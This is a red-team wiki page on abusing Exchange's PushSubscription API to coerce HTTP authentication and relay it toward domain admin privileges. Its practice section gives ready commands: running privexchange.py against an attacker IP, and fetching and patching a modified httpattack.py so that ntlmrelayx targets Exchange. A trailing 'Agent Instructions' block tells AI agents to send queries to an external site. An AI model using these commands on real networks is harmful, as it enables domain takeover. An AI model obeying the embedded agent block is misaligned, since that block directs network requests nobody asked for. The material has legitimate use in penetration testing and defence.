# PushSubscription abuse

## Theory

"PushSubscription" is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. **The coerced authentication is made over HTTP**, which is particularly powerful when doing [NTLM relay](broken://pages/PFGlaZOk9WQQxTsZmSJ0) ([because of the Session Signing and MIC mitigations](broken://pages/PFGlaZOk9WQQxTsZmSJ0#mic-message-integrity-code)). As Exchange servers usually have high privileges in a domain (i.e. `WriteDacl`, see [Abusing ACLs](broken://pages/4BIFRCf5fXqahfOIAeGb)), the forced authentication can then be relayed and abused to obtain domain admin privileges (see [NTLM Relay](broken://pages/PFGlaZOk9WQQxTsZmSJ0) and [Kerberos Unconstrained Delegations](/ad/movement/kerberos/delegations.md#unconstrained-delegations-kud)).

## Practice

[PrivExchange](https://github.com/dirkjanm/privexchange/) (Python) is a tool able to log in on Exchange Web Services and call that API.

```bash
privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET
```

{% hint style="info" %}
In the situation where the tester doesn't have any credentials, it is still possible to [relay an authentication](broken://pages/PFGlaZOk9WQQxTsZmSJ0) to make the API call.

The modified [httpattack.py](https://github.com/dirkjanm/PrivExchange/blob/master/httpattack.py) can be used with ntlmrelayx.py to perform this attack. The attacker host needs to be modified in the script since it is hard-coded.

```bash
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py
mv httpattack.py httpattack.py.old
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
sed -i 's/attacker_url = .*$/attacker_url = "$ATTACKER_URL"/' httpattack.py
cd /PATH/TO/impacket
pip3 install .
ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmx
```

{% endhint %}

{% hint style="warning" %}
On February 12th 2019, Microsoft released updates for Exchange which resolved

* the coerced authentication issue
* the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission.
  {% endhint %}

## References

{% embed url="<https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.